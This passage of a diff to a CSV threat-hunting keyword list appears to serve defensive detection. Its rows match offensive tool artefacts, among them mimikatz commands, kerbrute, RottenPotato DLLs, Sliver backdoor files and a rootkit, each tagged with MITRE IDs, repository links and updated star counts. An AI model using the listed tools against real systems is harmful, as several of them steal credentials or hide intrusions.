backdoor obtained!*","offensive_tool_keyword","POC","This is a PoC for Nimbuspwn a Linux privilege escalation issue identified by Microsoft as originally described in https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ (CVE-2022-29799 and CVE-2022-29800)","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/Immersive-Labs-Sec/nimbuspwn","1","0","N/A","N/A","1","21","5","2022-05-05T10:02:27Z","2022-04-27T13:04:33Z" "*root\cimv2:Win32_Implant*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" -"*root_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Rootkit.cpp*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","742","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" -"*root-shellcode-linux*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*root_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Rootkit.cpp*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","744","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" +"*root-shellcode-linux*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*rop.find_gadgets*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*RopChain.py*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*ROPEngine.cpp*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" 
@@ -15917,41 +16098,41 @@ "*ropfuscator-*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" "*ropfuscator.*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" "*ropnop/go-windapsearch*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*ropnop/kerbrute*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*rottenpotato.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*rottenpotato.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*RottenPotatoVulnerable.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*ropnop/kerbrute*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*rottenpotato.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*rottenpotato.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*RottenPotatoVulnerable.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*routerpasswords.com/*","offensive_tool_keyword","routerpasswords.com","find default routers passwords","T1110.003 - T1200","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","1","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" -"*routers_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*routersploit*","offensive_tool_keyword","routersploit","The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.exploits","T1210.001 - T1190 - T1213 - T1189","TA0007 - TA0002 - TA0001 - TA0011","N/A","N/A","Frameworks","https://github.com/threat9/routersploit","1","1","N/A","N/A","10","11408","2303","2023-05-22T21:50:32Z","2016-03-30T11:43:12Z" -"*rpc://* -rpc-mode ICPR -icpr-ca-name *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*rpc::close*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*rpc::connect*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*rpc::enum*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*rpc::server*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*routers_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*routersploit*","offensive_tool_keyword","routersploit","The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.exploits","T1210.001 - T1190 - T1213 - T1189","TA0007 - TA0002 - TA0001 - TA0011","N/A","N/A","Frameworks","https://github.com/threat9/routersploit","1","1","N/A","N/A","10","11407","2303","2023-05-22T21:50:32Z","2016-03-30T11:43:12Z" +"*rpc://* -rpc-mode ICPR -icpr-ca-name *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*rpc::close*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*rpc::connect*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*rpc::enum*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*rpc::server*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*rpcattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*rpcattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*rpc-backdoor.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*rpc-beacons.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 
- T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*rpcattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rpc-backdoor.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*rpc-beacons.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*rpcdump.py * | grep 
MS-RPRN*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" -"*rpcdump.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*rpcdump_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*rpc-hijack.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - 
